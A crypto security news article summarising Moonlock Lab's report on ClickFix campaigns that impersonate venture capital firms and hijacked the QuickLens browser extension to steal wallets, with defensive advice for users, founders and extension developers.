Share article

ClickFix threat actors just leveled up their social engineering: they allegedly posed as venture capital firms to lure crypto builders into "fixing" a fake issue, and they also hijacked the QuickLens browser extension in a supply chain move that turns a routine update into a wallet-draining risk. The common thread is trust, first in a brand name, then in a browser extension you already approved. [1]
February Crypto Hacks Plunge 90% to $35.7M, Quietest Month in Nearly a Year Despite $10M Oracle Attack

Moonlock Lab flagged the activity in a Monday report, describing two recent campaigns tied to the "ClickFix" playbook and noting the technique has been tracked since 2024, with broader adoption across industries and a spike in crypto-focused targeting last year. [2]

Enjoy articles without ads?

Register for free and get unlimited access to all articles.

What ClickFix is really doing (and why it works)

ClickFix is not a single piece of malware, it is a delivery method. The trick is simple and effective: attackers manufacture a moment of urgency, then walk the target through a "fix" that is actually the compromise. [3]

Typical ClickFix flows rely on:

  • A believable pretext: a broken meeting link, a document that "won't render," a KYC step that "failed," or a portfolio file that "needs a quick patch."
  • A guided solution: the victim is instructed to copy and paste a command, run a script, install a "helper," or approve a security prompt.
  • A fast pivot to credential and wallet theft: once code execution or browser access is achieved, the goal becomes session tokens, saved passwords, seed phrases, clipboard data, or direct wallet interactions.

Crypto is a perfect target because the operational culture rewards speed. People routinely install new tools, connect wallets to unfamiliar sites, and jump on calls with strangers if there is a whiff of funding or deal flow. ClickFix weaponizes that habit.

Moonlock's key point is that this social layer is doing more of the heavy lifting than the malware itself. If the target believes the instructions are coming from someone reputable, the "are you sure" friction disappears.

The VC impersonation angle: targeting builders where they are weakest

According to Moonlock Lab, one of the latest ClickFix campaigns leans on fake venture capital firm identities to approach crypto talent. That matters because VC inbound is a known dopamine hit on Crypto Twitter and in founder DMs, and it creates a power dynamic where targets try to be helpful, responsive, and fast.

The mechanics are not complicated, but the positioning is sharp:

  1. Impersonate a VC or an associate with realistic branding, language, and outreach cadence.
  2. Push the target into a "lightweight step" like opening a deck, joining a call, or reviewing a doc.
  3. Introduce a "quick fix" when something inevitably "breaks," then guide the victim into executing the malicious step.
This is not just phishing for logins. ClickFix campaigns are designed to get you to run something, and once that happens, a wallet is just another high value application on the same machine.

For founders and engineers, the uncomfortable takeaway is that "VC inbound" has become part of the attack surface. If your security model assumes inbound is harmless until a link is clicked, ClickFix is built to bypass that assumption.

Xaman Founder and XRP Ledger Dev Warn of Fake NFT 'Passes' Scam Designed to Drain XRP Wallets

QuickLens: the supply chain variant that hits users at scale

The second cluster Moonlock highlighted is the hijacking of the QuickLens browser extension, framed as a supply chain attack. Extension supply chain incidents are uniquely dangerous because users have already granted permissions, often broad ones, and updates can arrive automatically. [4]

Even without exotic exploits, the extension update channel is a distribution superpower:

  • Users do not re-audit permissions after every update.
  • Chrome and browser stores normalize trust by making installation and updates feel routine.
  • Wallet activity happens in the browser, so a compromised extension sits close to high value workflows.

Moonlock's reporting ties ClickFix operators to the QuickLens compromise, indicating attackers are not only social engineering individuals, they are also pursuing scale by taking over trusted software surfaces.

From a risk perspective, that is a meaningful escalation. VC impersonation is a spearphish. An extension hijack is a net.

Why the extension route is so effective for crypto theft

A malicious extension can do damage without "hacking" anything in the Hollywood sense. Depending on permissions and implementation, it can:
  • Inject or modify web pages to swap wallet addresses or alter transaction prompts.
  • Read clipboard data, a common way to redirect transfers when users copy and paste addresses.
  • Harvest browser-stored secrets or session artifacts, depending on the environment.
  • Overlay phishing prompts that mimic wallet connection flows.

The result is the same: users think they are interacting with legitimate UX, while the attacker controls key parts of the funnel.

The market structure of crypto scams: trust, distribution, and time-to-drain

Most crypto theft is not about breaking cryptography. It is about breaking routines.

ClickFix hits three things that repeatedly show up in successful drains:

  1. Borrowed trust
    Impersonating a VC borrows credibility. Hijacking an extension borrows credibility. Both reduce scrutiny.

  2. Distribution leverage
    Social engineering scales through DMs and email lists. Supply chain attacks scale through auto-updates and existing installs.

  3. Compressed decision windows
    "Fix this now," "call starts in five," "deck won't open," "update required." Time pressure kills verification.

If you are looking for a simple mental model, ClickFix is an operator playbook optimized to convert trust into execution, fast.

DOJ D.C. Scam Center Strike Force Seizes and Freezes $580M in Crypto Linked to Chinese Fraud Ring

What users and teams should do right now

Moonlock's reporting is a reminder to treat browser extensions and inbound outreach as production systems, not casual conveniences.

For anyone who installed QuickLens (or any similar extension)

  • Check whether the extension is still installed, and review recent updates and permissions in your browser's extension settings.
  • Disable it first, then investigate. If you need the tool, reinstall only after you have high confidence the listing and publisher are legitimate.
  • Assume compromise if you pasted commands from "support" instructions or a random doc, and move assets accordingly using a clean device and fresh keys.

For founders, contributors, and "crypto talent" targeted by VC inbound

  • Verify identity out of band: official domain emails, known partner confirmations, or a separately sourced calendar link. Do not rely on a logo and a warm tone.
  • Never run "fix" commands sent over DM or email. If someone needs you to execute terminal instructions to view a deck, it is already a red flag.
  • Segment wallets: keep day-to-day signing wallets small, keep treasury and long-term bags on colder setups. ClickFix thrives when one hot wallet holds everything.

For teams shipping extensions or browser-based tooling

  • Harden your publisher account security, including MFA and access controls, because hijacking the update channel is the whole game.
  • Minimize permissions and treat any permission expansion as a security event that needs user-facing explanation.
  • Monitor for ownership or metadata changes that could indicate a takeover attempt.

Takeaway: ClickFix is not "back," it is evolving

ClickFix gained traction in crypto circles last year, but Moonlock's timeline puts researchers on it since 2024. The shift now is operational maturity: operators are pairing high-touch impersonation (fake VCs) with high-scale distribution (extension hijacks).

The practical risk is straightforward. If a browser extension you trust can be silently repurposed, and if a "VC" can socially engineer a command execution moment, then your defense cannot be vibes-based. [5]

Key invalidation signals to watch: verified confirmation that the malicious QuickLens distribution path has been shut down, transparent remediation from the extension's maintainers or the browser store, and no further indicators of compromise tied to the campaign. Until then, treat unexpected "quick fixes," surprise updates, and too-good-to-be-true inbound as live threats, not background noise.

Tags

#social engineering#ClickFix#Supply chain attack#Browser extension hijack#QuickLens#VC impersonation#Crypto wallet theft#Credential stealing#Malware delivery#Moonlock Lab